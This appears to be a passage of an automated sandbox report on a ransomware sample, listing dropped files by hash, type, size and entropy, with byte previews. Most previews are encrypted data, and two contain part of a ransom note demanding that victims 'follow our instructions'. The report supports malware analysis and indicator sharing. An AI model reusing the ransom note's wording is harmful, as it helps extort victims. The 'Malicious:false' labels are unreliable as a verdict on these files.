                                                              SSDEEP:24:AtPP4j6aB7nDWNd8QzbRnZMSB1xySfnIGQQekyNQ6uZOenrMMjTIXi41:AVP4maB7nDWNdl/yEEZNQ/ZBMoTIXj1
                                                              MD5:9C97C742F9AAEA486D4F32629B68925B
                                                              SHA1:98A7BF3FDD7478BDCEC3E92B602D1DE2D68C32D7
                                                              SHA-256:442D201EBF130FF04919AA95EEB97BA655849F2B85377558445CC1475C6F7521
                                                              SHA-512:1E772C736638CE1BEC5583FA45F3197DBAF789D941B1C14FBD3B420415C072F538F4F7E10756D000796B9EA0105DBE4E45BA7CA8A43DAC63F0D04579473B70AB
                                                              Malicious:false
                                                              Preview:?......{....o... ....$c4.....1M.......hF..f..?......@...`..c.o...I....N@....}..w/.f..d[./...SS...t.0J....ei....N....m@.B...5.....Y..@].z.P..h}..`..h....s.8..h.f.r...x.O..t<............e;.P../....c.e...M..Z...`....'.r.A..FZZ...$]Z...ga......2Ra#.@.......3i.h.+c...Z....................'....o..jwA3.L}4.^.j.....+\.'..A..<...P.a......=...2t.\.#.D|.zQ..i$)2.D.......8<g.J.Da.....|9.....e.N&..{...Yg..F.(.~....Y.1...+/.D}..E.l..1G\.......4...]..ZS9N..g\z=..2[.T.....8..8.y.&..IU%....QF.E....;7..$..&>%M).....J;/.5|..h...b.b...^Jn.........#...<..3fu.6.2.[J..c.....0..&..n9R<^.~.l1.h...A...x./g"..,...a=..0\G..`.I...E./y..).Y.C..d&.@.vA......].r...A.GY.Q.}....^....ycj..5eP..b.+....._oN.......Qo.V.8..'-R..>Y.~0.h.......%..NK......jLS.G(+.v3.......j..6}..].....F....M..#.}..c..%...6....V.._9....@.=....c.4D......p.#...0..V:P...@.......CA.\r.X...Q...N&..mUu# .. ..pXm..O..>.e.........i9x5r4..V'^.3..GL$$.~o[.....GE .?...Rg..8-.C.#..4..!R..MB..R-.2;.h
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.857869101417447
                                                              Encrypted:false
                                                              SSDEEP:24:8Wf8KNUmRfNrkQRyN7amtcY56GMjtRPbghv3uDlr4nrMMjhCopVn:8Wf8KNUmRfNaN7j6lJ4GZ2Mo1pV
                                                              MD5:DAEB904DD264CE56BA64AFE398858F8F
                                                              SHA1:B67EA5C40A74EEFACC82734CEA930DDCB71442F6
                                                              SHA-256:654A449D7826400AC3137B726BAE50F3AD4774299EAAA8CC66157D2C2238CCDE
                                                              SHA-512:AA118FCEB131746D5441ABF5D48A4A7CC043B0DE316E04AB44E75A963D7C98E77D0BC0192A50F031A8C93D41964E325216C85EDEA8C68CE7DAF8F6683FC54818
                                                              Malicious:false
                                                              Preview:....m...l...f..@.Q7~.(...X}.z...=v :.>.Q.d.h..o.D..f~.o..`..@....]o'"..#3..B.)=..4.h.(!w...\...Q.....!..#n...~.I.n...^..!...I.|uY...jbF....[.."b.8t.k..1...6_....W^nF.+...t`E..A..rq.Q.m..".9ET.].I...gC..T0..;..d4)....{......)..^....h..8<..2.y.`..h...J..+Zl.......!...f..G..5:*...8.%w_K..OeC.f3..K..k.O.......40D.O/rV;.` .W...|..$.7{@._....f..)...g..&...R...]......$?...+.>hk.!.n(./.H.....V4>.......L...0../....fb.WAn.yhk......v....l......pw..L....%<._...u.pd.|.O....t.........^.~..Mo.>>.`.7...S.......>.]Y....@.-.<...J...l..].-*.L..*...G.D}.u.".j....i.@_p.<.Z.i...)...@vjA...@x).1:..cU.8...r..............ub@.U...; }..z...'!..l.cE.....D.L..,.n.......z.{...G..^.i\.....A7.oU}.. H`6qd.....Z.g.pe.9..t..H...4zK.f..m.P...5c......R..6.<.Em...[.]..................N..U...O..O.G...z~..._w....*......0.z.^....;..........E....2....../.:qOs.?.j....~_.0r.6.._.d!F.Z.vP...F..C..1.aIq.......@....\X].5.4.*....):;..5X.).t*3..i.%+...x....gC.C.a%.3=Te.E.I.....C..8...
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.84353307406569
                                                              Encrypted:false
                                                              SSDEEP:24:2y46dJw58NUkcHhU06UYFI7qDYU1BwHyUHxsvmySl8nrMMjZl:2y4SJw58NUkcHhcr+pxsvFSliMoZl
                                                              MD5:9B8079F41906FC5F4480645F7B07DA77
                                                              SHA1:3F7F858D1AD8FD05F8A8D0C4B8C547C943996774
                                                              SHA-256:92F956FC21322371A795757786E5EBC6E0D53BDB925C7C6097504214D229EB82
                                                              SHA-512:3F5CF146A2F90A6C583029D3EE65E2A65EF8DF0ADD792F2CD9526A49B2247F1C50C7D6EABB329DA7BB61D85B05DA37823260195123D455169B6406F84598AA94
                                                              Malicious:false
                                                              Preview:.bc..[....UN+.../...BT..t....t....o_..-....%`.J.....4.m.."..<aAb...L........C.Yv.)r4[.........T....}<..U....?yO.\n..mb..eE.D....I..?z._9.B.Uwp.3'e.K....Tl..x.3%....S..@.V.5g..Q............V...<.. a.....pi..K?...i.J.].N..=R#...DcO..x5l..kXS.@..X..>...1.V.."0.].....M.......TY....l.F}.WR.N...~...f...Ef..Sy\0.....^......\>.D...\yL....8.8}}.i.o..k.*.mj.p...Ik.}..B....>I.r.O..A...7L.,2..J:".'..J{..Z...l..1.....S.\......Q...@.\.f>_..f4._oV.1.kg.q../.....u.......*.'...&.......up0..Sk...d.aP..%`...c!.*..G.X1.J.<C...d..F../.......@X.+1Y.O...Wk..+.Q.Q....M.!.@.l.RKr....i..a.'....Z........tV.....o..#3;=V........?.8.."e7B.. .i..dl.W5....o.....j..._..Q....K[X...p^/7.w.F....R...b.D.8^a#..h._d.9.Po..o,....4.H]...)....6..._.........Eu.......=<b.G..}...-...q..s......~Q.^.}D. k..F..H.*...Y....'Li}F......m....R..y.."..p..%..a..)..=..p..]....[OAq..P..........-.}I....&...b.......+Sx>...Z.....O.#...8@f.....n....%-e,.6.1.Z....Cg.9Fsb..#......n.....%Q..7b..
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.841258603998591
                                                              Encrypted:false
                                                              SSDEEP:24:cI9fcRclaBkyFrMStNr/kEZn8YHskNXW897nrMMjC:cIJc+bSLr/k8n8YM+WM3MoC
                                                              MD5:73345E09A82B1150D5B04FCC648CFA79
                                                              SHA1:859E6AD9EB98DDB6C256D07B24B05FAFA757D791
                                                              SHA-256:7F8BA83C144E92732ED7913FA75047B001F6E1C4BD1C9070BE669216ED9CDE22
                                                              SHA-512:484EFEAB5D0976298FA7946572E71D8D534BD272129DDFE6B2C886704A478FAFEA027864FAF283F9E346E9AF07CE21BD30DCEDE1BA3AA841418DC94A43D33D82
                                                              Malicious:false
                                                              Preview:-.s%..."~..^c..M..;...e.....:...F......U..&D.'....>ZL.....~q....AY.7..|...........2.N0.b(o.e...aC9...|Zs../F...$.<.ci.S4..#'.1..sdC?|.1.UC..).1.U.'...b......K.2..u..._NmF..b...Q.7K.3.F.L..3.O>.. . :......(.p...Tl.N./.....H..P..y...ARC....G.e....H..U...Ku....6.a...B.....\..f...m.W..x..?.d[..LG7+."~....tC..OR...U..n.;1P..j.3.C.8.....L....^..^(.....zW2c.....s..o8.N.eU0....s.@EO......>z.K...A.J4...).:J.......A..;....e....U..W..s.MZ..P...F)...a..n......J.6U..#+).|fs.1.P../#.=..9..&T~C.t..^...lCrT..#...PPu.....)u..L@......s@.c....Q..>YB.....".>.....!......t.......D.!W.3....s.i.AG..>"V.2..1=T..w.....i.3&..O9..H.m....M..c..<:..O.&..+\.M..[...'..dPwQ./cD.c.O_I.i..o..~.+......n.q;.....an..+<....:..........J.^]>.r.......`..r...}K..P^..$.z...<..}.....1..6w.W.'...[$.`Y].6.Z:...2.BT[...V{-..C@..e9u1Q.za.....mS.^.\....>...y..../..I..{JK.l..1s^.Lq..a./...5i...._QR..m......].~.x..@.8..[D...Lq.Q......?.......;<...bY.Nb....w..a4....;...n...m:>.......~
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.838121768283758
                                                              Encrypted:false
                                                              SSDEEP:24:aWEslS5AAnYQEQICiVMp3l43F3K7c+2OZN2XCRq1bbLtmJJDJGnrMMjA:aWEsl0AUYQEVQ3uF4cnO61/MoA
                                                              MD5:685BD0CE782719ED07451F366961B5E6
                                                              SHA1:ABDE6CB4F3F046B05EDC4CC446395902398D982C
                                                              SHA-256:6C483449A29139473E0927457A803F6DA9AD0FA534B9D1307D18122733F88302
                                                              SHA-512:43CF16A80A4AFBAA11EAEC20CF89E38EF18484DD40FEB944A555F7C918B4CE1DB3EB5E6F650B76B3856C626ABEF4B42437E6E0903BE527AA5AB6E497A6660747
                                                              Malicious:false
                                                              Preview:..V..>....a/x&.yw..S.....4...1.(..+..\.rG....f.#...M?P.(..i...0).Ls..........E....4....~t>SP&..*./.Z..`...>l..=...!......j;R??...D...M..n......#........!G.X...@r.2.?%9n.8.C..,1W..ge.K..u.L...%+>....v...3.)=...,....#.......S}.5.L........m\.;..v"z.].&....6..S..t=,k2:...V`7....g....<.\].H..0.a.@u......3..!.....#.-)IM2.a.....f@|.T..;...M..>W.?..E9 ?b.+Z..$...r.y.k..h..c. Y0.d.'r..v.Io..WGi.!f*.o."x..m._.7C....|.O..<..S.....(.J.H.q.!...c.}....Fp...+&.*O.~...z"P.g.8..:..?......s...n.{....:~.O...F.a.....W.>....=3....W....;Ya..w...?<..@...oKU..C.f..O~...bq...V.e.....d..q.0...CX6..;.RMZ{j~.{...K...R.xo]../.0.*-..k.8.0?nx... .:..bP............E.U]...A..?f......!..D...X6.ai....qQ...".'NR.S..:.....i..$4.v.....zv[-z@..e?.x<..,..TOkN<.7.[V.&)Aa.q..Ku.'.F..~e...9..5..#.&..a.~K ..$5 Q.H q...BU.4D..@...W-..!.Cp..p}.Z..y.Z.....N...7..2..I.....b|....3..^...|Z;..........l2.|u.....'0:..cx.....o.I..bt' $...n*...(.....".Or.iA.....u...I...=.VN...`Z...b.7..._~J.+....@EuA....
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.837126466355333
                                                              Encrypted:false
                                                              SSDEEP:24:UieU9g3EW9jMaQ6OktDh/66s4O5R44NfgJtUMx+nrMMjY75:FeUmUW9FQ7X6taHNfWqMxIMoYd
                                                              MD5:4DDC345DF33A2E51462BF43E11F53081
                                                              SHA1:2D9BF538FBFC5F2C78B5155D9424565B25C8EE4F
                                                              SHA-256:5A1A72F81208D0A833D0CB1214EF31E15E1B0808AE9DBB6A30DEC9A057B442C4
                                                              SHA-512:EEB735101F0B4529EE4BF0B319015431D56794DEB6FC4D0272F6CB23C0A91E5A7F7F4FA73EE6F296BC991D567E064C46A2F2A92C98CA5A04925083001159A591
                                                              Malicious:false
                                                              Preview:..lr.3.f....S........dL....X.%l..@.h..u..bI......G...Z....Wb{....1.MY=..H5.1w....#S8].....X..\o......8.~.h......iP...p.9iiK.4..X..i#.=..u....^..a..uD....X.%..u..J?...&.....>2#.|...jLf.....G..W.+.cP..."...N..*..W....6o.....A2......h.)iF.+.p...-.A*4*.4.O..,.6.dKe.!....oFe..X...)W.Dwb..[0.X...Ks.I....w....2geL...)..W8....*#h.C.`..T.6yb"..h"^.$....l..+..z..0..w..9c.o.......,.....y...M..&.Te....,...K...j>.....l...;...*w.Eb.o.........Z.8E.2#do.g].,.Z..y.nO..0..p.4A..$:...%......Nt...o...*........s...e.........z;..s.&..z$.....sa.@d.K..H.a.O0.....-%".&...m...1H.q..}..H..2....>...|......O.H..|.U,z......(.W......._..`|.b.......Em.Agq.e).$...h.]..S.lt\.'.[.^..E...~....a..@.rL..0..f.B.....:...]..........`..$`;4.....P...|.....P. .....lF.E#gz....o.Z.c..`..-...|...J..N}Z.\..x.....`R.=z....q.Hr_..G..ZN..@R.f.4~bmZ..nX.7_.jN...........E...rE.b,...Ek.a~F..q...y.....\%....N....I..H. ..G.B...Q..|...r...IOuL.n.s...P.Tr....G..^......Fl.E~.B.....
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:OpenPGP Secret Key
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.844537833392778
                                                              Encrypted:false
                                                              SSDEEP:24:c76aTtL/satbgROIrmzYntoMQ5k5wy2j5ltWUf/v6lAK40ynrMMje4T:BpSbk6ctoj5kSzTf36lAK400Moe4T
                                                              MD5:8263747E8DA11149CD9FD6EE68968473
                                                              SHA1:C513FE1E9D47F568B40022550BB3C375C4C2970A
                                                              SHA-256:9FF48A5A799CCD9A38EC99A5613966A27783029255C3B4011B5CEA5AC03441E7
                                                              SHA-512:9137D1F53C5B49233602585E8C638900E4EBDBB6052F600D5C67030F6E02772FD9F3B0A6C1D2036D11D8B49A0E7AAE9BBD1DDE1DFCCB38D93D1DD98A928A2CC1
                                                              Malicious:false
                                                              Preview:.F.N...,.R.........(..(.E.\........k.../..:L]W..H.c.}.'...%.....u.H2?/...D....@.....D.....U.W}.ja..).[wX72...C.`?A..@YB".:.$..N3..r...Wyv..........?....S..w7..+cG..`L.|^....!.........k...5...........0.9..t...[.I>.[....c.i..1...o..}..FE.mR+.....q.dq..bYZ.z.../...-.-K..>...)x..]D....J.n.........T.2[..<.Y|^...c..&...vz.z.vu?B.......p.;..E..@./..d..."v..>.j.......S._.a.:7...D...<.....a...j3.)xpkz.D.cT2....M{%J.0'..c]....1.Us...QD4...s.p.O...n.*.F..3"..2..N.q.J..1.<.03f9........da"..%........uo.../y...sh1,T..C.R..LM.].Z.$......x....xw="E......X..Y.n.. .r..6......#..KUi4$w.........BCO}..5....X)3...V^wF...*....Mxb...9b....q...sz..U...Q'.....O.k|.......'.....TQE...l}...>..Uw...F.=.[..lb..../...._.0d..l...2...k....cm.....7....].B..+.......!p......E..^....f...2..^-.7.'..)c./...../S...#Q..&..wit..I....1.q,.2Tz~..^..*...6,.z.....V.l.7l.-.#..^..&.@.T._.g..kt.....P..)v._......<S....s_Q..k-3|..R.J:....8>.Ax.r.}....K....<.N..p-.:&W_.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.852297748956807
                                                              Encrypted:false
                                                              SSDEEP:24:waC3SefQL/jW5SJmgXPaARdb8RL7fid1CQoP+oi24nrMMjQ7:bynIjBQ/88RLmd4QomD22MoQ7
                                                              MD5:5B5546B66778F9B3685B1E7E5EA4833A
                                                              SHA1:8742BD32F9FDA998C10F3883142DA768C755B746
                                                              SHA-256:C3819848BD4D27D9FEAC3B94A26F461AC92EA1F4EA6D6A22E550578237600A2E
                                                              SHA-512:777C83268FB8CF0D68ACA60324B4420483AD5AD3564657DBA3A4D8805C98D4656EA4B32E43717815D0144C433556C33DF779982A7E6B8765E8669C98EDC22E41
                                                              Malicious:false
                                                              Preview:G6..K`}Y>.....E."..sN"..6...#x....a....fCS2.0.....'..'..+..8...H.yFX..E.......~.......i.,vqe..yW#...J%.............|+.......F....r.N.U.H ...@X..\..qQ.C#..>..N..<..;...B.V.>..g.H...i.&...p0b.R..D.........B..K....d......S.A......wf.Wj..6.jb..v.e..fD._C....I.=t.\..%o....#.s.x........}T.K...U..vH.........5...;..~[..m.........{;3.. .-..,..3q....&GZr $.UCIE...w..b...".0..Ha..UP7zVV.....G.MGY}C....u...u..6.0(......7.....,.Z..o.+....e\..F...4E.Y.aY.7.......v.s.u1......E\.A.S..I..J.{*4..&i..e3....4......j)#.].....My.VHa..}......0...,.X...#...tK..........PD;\(W.&..9[...lI..H..:.t........h.4......6..,...sk@+....&-q.......2......,.N..*L.....zHH5.-.u...r.o........F.Q........=TC.JY+..............-........XO....\.....Y..{.xO...X...M.1.....A...=.e3d.pq....1s....z.bT.B#..._..z.A'lv;\.4.y.AwA..r.(,.'T...e..u...~...;p;.......e.5|..*...x.O.&.>...g.,...Jx......*3.R.....j..f..f.=G.s..}..V9x....U/. ......k"W8.hK.\....<7....eSV...c..B.G.C..Q.I8#.k...
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.83164578892014
                                                              Encrypted:false
                                                              SSDEEP:24:8uQ6aoJi6Q1mfVIKehUi8+dOryGmQDIkjxk8RN8hKnrMMjk:vQ6aoJ212IKehUNgOtm8IkDv8iMok
                                                              MD5:64335F73C20D227F460C753870077725
                                                              SHA1:126395C312BBA6DDACA3E04FECFAF9FB346EA02B
                                                              SHA-256:CE1782A6A0736720C69954705F62E8529516D791170B0380C67D2000310F059B
                                                              SHA-512:6F032DB84F5F960C68EF9598DF0250902CD6DB096B7D880E786704D6CCB0E49E7740DF36F0E8CECB02E8B8C86D1E052721B7CCC0CD3E0D31A71CD81569C60CA5
                                                              Malicious:false
                                                              Preview:..4...rod....'..b...iY5.)X.7.q?`;...P.3.W..h...'Y....{...ww?...$W.&o..'..sZ.J..N@.=.../..8.(.i.6.w.m.r..p:6...i...<.|4/.P*..0d.{...?1..`......M....:....y.}.z.{tX....h..\.#.oP.a%e.3.c...}.b.....x.b.j.ejbo..O....K..y...8).Y.\.......DP..N'..R....].w.T./...X...|.M...&.....py.P....v-Cpn..LU.qr{........;Gd...'2I..T...~..[.z.Xi....F....BR.!>.......??.sY... ...8m.URY.....&*.l[.....X}q..K..\...Ga)B=..J...%sf.ml.0`xb....=%..}.{j......uD.G..5.j9.fv.=...H...^F..~...6..........:r.|.F.$)$7.=_.=b.O`=...e#. ...9...:.E..*qV..8...Au.g..n.K.4...2....A.N..m..s.1....4..-..........(.z.].7.Mo.D..5.9n.6............b....:!...1.....F.O?...../D...`^:.t_+.p8.#.wE...*.|y;!]......c.p.l_H|.9Y.>;. ..?.g.....|..8....>..i7.N......|7.~...Ua.....7?m.ii2...l....q...L ......(..\..,..F.f....|.g.. B...y..w....{].@....(1Z.t|.U.5.....M..2)..PMn!6.......|....>GHt..b....z40.|./\..?....Wx.:l......F!w.:.....Q.nv.I.XF ..rv...H..J.*?g3.}..p.M.p...$......../..?.<...V..N8.;.$..H.&o
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.858205239552512
                                                              Encrypted:false
                                                              SSDEEP:24:YSBHMnHN6V6YZHyUEEUCHJxBW2REDhRVnip4W5gynrMMjhHFQ:zsnHCjZSrfCpZREDhrg4W20Mo3Q
                                                              MD5:3FF75E5CE7CB29EFD1A95BC6A0290E69
                                                              SHA1:6C2320B353AF966FB890D6191BE1EBD6D29D9DC0
                                                              SHA-256:51AB38F8284C40C60B079177D573955590A1CA645707F13CA45E41D499EBB99A
                                                              SHA-512:0396291FF354E0AE31A309F1030F29D8D96CF9E08F6C5E04D122050A6D9A644305A2FC901925792462573B24EEE6C51DB51D24AA58493A6CBE00EB9D6911AFC4
                                                              Malicious:false
                                                              Preview:.l....k.j....j.E..a...."...C.B].|..!...[.....>.h|..WaV.%.@......b....W%...[!....N%...x.C...w..#..Ke\,.yX..^ue......tF]PGN..g;.. ..[..$.....M...I4.=w8..CuQ%.F1..f.OF2AD..r.3L.7KPE.o.E...wY.{.t....r..8.q.pVl..p..d...M...$"ql.9W.P...."...u...:f.S8d..+.8.]rr=.M.....J..O.iQ.p.Oo..o..-Y.R.K.$&n...,....0.K.|.a.)/..Cy.6P+.-_.>....FD.`...X.yf).K`....h.'$.'.v..W.....)5y|...*......-...U....a....PE. ...t......D..:L.P..M.u.P[.l...s[1.3x.x..2K.G...n......)..Bt..0..{.#............$*...9=..9_.Tfg.e@eFWT.1....y.I{.......r....".......nn.B......n....H>.)..,.b.z.c.m.7.K...}l..5t..U.B.#=|.A.>),......TJ...x..yG..2.k......y..8....&.+...`.......1........^.z..).y...U}..E.$[a........*.&i_w.*..a&.T+.f$..R..2......>..`,....U..+..^..O2...\...R.yo....G.W4....*.l,.ir.0........c.A.k...=8..g..Iu.H....J........^.%.._.._..L...c.).j...D.M.$...aO.j7.T....:z.....8h=9....&..0.....:.....Z.0.m.f..[..s......."..u.....nnF..@..........:..........U>.....,....V....Z.....(...=.b......*......Q
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.831496534885937
                                                              Encrypted:false
                                                              SSDEEP:24:sIvyscBgxtEg5DdOLyrxd2gaSb1PtpZ0a+y3bhbWfXDPzQkrtGdRnrMMj2SH:f6BSEuxOW6gDZtpr+y3bZiXWLMo28
                                                              MD5:DE90C9270580A8D37467DE786F4761A2
                                                              SHA1:DEDFC089AC79CDF3B181488DB22094A3B94DDA4F
                                                              SHA-256:03ACEA36F7717A0957EDA676589C6DA54F515925184B6AF28C58098527CF7D56
                                                              SHA-512:7E767A09AAFF27BC0EE7FF145A43D5C7BB494B60DE68BEED33F642D1B29191A74207AD339872020BCB122D22F4A483CD7DF6DEB3E5328EB9A2BF64AD55C792C5
                                                              Malicious:false
                                                              Preview:.6]q4.../-!.O..P=...&.I@...s.-..ZF.4?9..-.J.ax.....*h.R...1.R...~2.+Sj.H...\...un.~..`....>.*X...gw.C..|{,.+.Q)....#.;.p.?Mq/<.\...E=.......7%]W....8.;3/..\.`U5~. P.x.d.........Gui...n...k:ZFMr]..^........U.-l..9B]M..J.'.H.Uz.I..+...V.Q.8.2s*$.....&.. ..w?.\$.pv.u.J.u5:...2e.......DO.0..p...*y|.'........a`.b.._...c`4Kj......G|..T.`+P.~.V..$.........2w7..9_#>1......O.c.Y...[Q....k.....!N=E...k..zh...HB.>..........9d@)}..&.....D....;..7.'z.|-.)s.6...)..WQ.1..d.wJ7v...vE..b.O+.{y..f.....h~..|92.i.9....G#.N..6.wIKEl.l....vL|0...<.K.-).6...KS........A...XH.X........p..*5b^..w.A7...8....l..{....}W.7t....4.6....DLc......Rxm...U.kI......#..6..w.M......u.0F.8...]<V..F...S.r.P.7S.gJ.Q..7,..A......+5........6G.c.|J...O.2.......WU....d....R2.../w....._.e+.P......X.....t.Vxb@#.....4.3.B....)P"...."...\N.Dx.....2.2.p...z.......Vv..q...[[4..8/.9....C.(V...q.....~+..E.Xu.......v..c.i....H.....l!.$.....{...^....:E....7.{.r..5.KV].$xJq...Z;E...8....g.k".>._...6.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.825958230829742
                                                              Encrypted:false
                                                              SSDEEP:24:+EtVp4SJ8MLhKpNnJS45JLpOLPsYu2V5qyaeznrMMj/LVu:/TLONnJS45FsLEvryLPMozA
                                                              MD5:51E8C6B83D659EC97C76803B98A1DE69
                                                              SHA1:42BCE4C6313751535F164CE8136286F7638A4AF4
                                                              SHA-256:F25E2618E7BCBCFF5D2BA9D934CA869BE105735D88D8235A5E8B8AE45C1E9E65
                                                              SHA-512:46D8B3378FC4E4FEA4F8602942D57F2813E3F4F01CF20A5459D26C4174658C01F70222C1D4FEC3DA9728ED953FB6EE9DAC5D516AE4B43D88B3B5276D99F2E7E6
                                                              Malicious:false
                                                              Preview:...E{c.+8,.D.d."$.>.g..........=.@B......).....\..$..?~.07..).....z...S....|..|.......-m..i.T`......o.T..K$.c|k!.....K..Q...~....<...z.....(....(.Nf._.,.m&A@..=..._.~..61..U+......n...?..8.._e...A}..@X.4.N........3)`".H.u.;.I...... ..~Sr..{$.f.57|.}. ....Ck+@.u..m@...`...c.O.Z...%oI(GoB..-.........m..Ri..z..K....e..4...%,.x.....c...X.}.....#....S.%..[.......U$.O...Q.pr..C..vU.w.H...C1.d.Q1%qs...+.q._.)7k.v............BM..<.i5a...e.rR........g.9.W.=..bz@"...BW.drcIA.M..dZ.#./C.T..../..o3Vv........P......rW..f.9.-/.=m1T9.Q.....)......J...D. ....|Y.Kw].m....R...J$..o.a".....o..a...........z....Fh......d9.Q.....D4..~....zA...Q'..q..}..wp....30..`h.+.m.s.!C..... BJ.a...Ms.Q.Y.U...t....ZL.Hf.eN)...SP..u`9...bK.c....}.09....T8..G..g..Im...}...~A......P.o.T=md*".v......v.....!..`..$.....we.....S..k...L.........rU#x.R..5)...,a.(..w.=j.P..<-......E.P.L../9.T..-I..O........../...0......px.N>.....b......I=....R.p...{....
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
